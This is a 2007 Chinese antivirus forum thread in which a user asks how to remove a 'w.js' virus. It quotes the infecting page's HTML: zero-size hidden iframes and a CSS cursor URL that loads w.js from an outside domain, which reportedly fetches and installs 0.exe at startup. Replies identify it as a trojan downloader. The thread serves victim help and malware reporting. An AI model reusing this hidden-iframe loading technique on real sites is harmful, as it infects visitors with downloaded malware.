1   1  /  1  页   跳转

【求助】怎样彻底清除w.js病毒

【求助】怎样彻底清除w.js病毒

中了该病毒后,每次打开浏览器,进入任意的网站,都会有如下图的提示:


















用瑞星全面杀毒(对所有本地分区)后,提示重启后删除w.js文件,
重启再进入任意网站,还是这样。

经本人初步分析,该病毒由某些网站加载的 http://www.zpx520.com/0.htm 网

页感染,
0.htm中会加载 w.js 文件,代码如下:
[code]
<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>   

                                                                       

                <HTML>

<BODY style='CURSOR: url(http://q.zpx520.com/w.js)'>

</BODY></HTML>
<iframe src="http://q.zpx520.com/1.htm" width="0" height="0"

frameborder="0"></iframe>
<script src='http://s111.cnzz.com/stat.php?id=430086&web_id=430086'

language='JavaScript' charset='gb2312'></script>
<script src='http://s61.cnzz.com/stat.php?id=474270&web_id=474270'

language='JavaScript' charset='gb2312'></script>
[code]
w.js在浏览器关闭后也不能删除,
而w.js又会加载http://w.zpx520.com/0.exe,0.exe并试图在下次启动时加载到

msconfig启动项(可用瑞星拦截)。

0.htm部分代码已经贴在代码部分了。
w.js及0.exe文件见附件。

以上是初步分析,但我认为,还有其他的关联进程加载这些项目。
请问怎样彻底删除这些病毒。

我一直用的是正版软件,现在是最新的病毒库19.22.30 2007.5.10
请瑞星工程师解决这个问题。

为了以防他人误点,删除了附件链接 。电脑侠客›F}wʟزÄbbs.ikaka.comúKñ&def9yˆm8@
最后编辑2007-05-16 16:08:40
分享到:
gototop
 

初步分析是个木马下载器。请把病毒样本传到http://up.rising.com.cn/webmail/uploadnew.htm›F}wʟزÄbbs.ikaka.comúKñ&def9yˆm8@
gototop
 

瑞星公司怎么没有反应,›F}wʟزÄbbs.ikaka.comúKñ&def9yˆm8@
gototop
 

很多机子都中招了.›F}wʟزÄbbs.ikaka.comúKñ&def9yˆm8@
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT